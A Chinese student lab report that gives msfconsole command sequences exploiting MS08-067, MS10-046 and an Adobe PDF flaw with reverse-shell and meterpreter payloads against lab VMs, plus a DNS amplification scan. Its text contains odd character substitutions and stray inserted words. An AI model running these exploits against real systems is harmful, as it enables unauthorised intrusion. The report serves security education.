首先利用msfconsole
啓用msf終端shell
而後利用search MS08-067
搜索漏洞,會顯示相應漏洞模塊windows
根據上圖,咱們輸入use exploit/windows/smb/ms08_067_netapi
,選擇相應的模塊api
而後咱們可使用show payloads
,查看可使用的模塊
瀏覽器
而後根據上圖,爲獲取靶機的shell,因此利用set payload generic/shell_reverse_tcp
安全
而後輸入show options
,查看配置信息,知道咱們須要配置RHOST,LHOST,LPORT,target網絡
set RHOST 192.168.241.138 set LHOST 192.168.241.134 set LPORT 5220
進行配置session
而後咱們再次利用show options
,查看配置信息
tcp
而後exploit
進行監聽
工具
search ms10_046
查找漏洞因爲咱們要對瀏覽器進行攻擊,因此咱們輸入use use exploit/windows/browser/ms10_046_shortcut_icon_
學習
而後咱們輸入show payloads
,查看載荷進行選擇,這裏我仍用實驗一中的載荷set payload generic/shell_reverse_tcp
咱們利用show options
查詢須要配置的有,LPORT,LHOST,SRVHOST
set SRVHOST 192.168.241.134 set LHOST 192.168.241.134 set LPORT 5220
進行配置
而後輸入exploit
生成URL,並在windows端訪問該URL,kali端如圖
輸入sessions
,可看到一個ID爲1的鏈接,而後輸入session -i 1
,接入ID爲1的鏈接,輸入shell
,獲取成功。
如圖:
首先仍是先利用search adobe
進行搜索
而後進行選擇,我選擇的是use windows/fileformat/adobe_flashplayer_button
而後set payload windows/meterpreter/reverse_tcp
,設置所用荷載,利用show options查看所要配置的信息
set LHOST 192.168.241.134 set LPORT 5220 set FILENAME 20155220.pdf
exploit
,生成20155220.pdf文件•輸入use exploit/multi/handler
,進入監聽,並設置監聽端口,主機號
惋惜我本次回連並未成功,經反覆實驗依舊不能成功,緣由不詳。
show auxiliary
,查看輔助模塊我選擇的是scanner/dns/dns_amp,掃描dns
輸入show options
,查看配置
輸入exploit
進行監聽
經過本次實驗我對本身的電腦安全產生了很大的懷疑,我有好多補丁由於一些緣由都沒有安裝,說不定哪天碰巧碰到個沒安裝相應補丁的漏洞,那隻怕個人電腦就涼涼了。本次實驗仍是遇到了一些問題,在針對IE瀏覽器的攻擊時出現了挫折,但好在通過不斷嘗試,放棄了對IE8.0版本的攻擊。特別是本次針對客戶端攻擊的試驗中出現了回連不成功的狀況,在反覆重裝了數個xp後,我仍是放棄了這一步,但其中緣由仍是值得深究。隨着課程的學習,個人網絡安全意識提升了很多,本次至少學到了補丁的及時安裝,儘量避免病毒、木馬的入侵。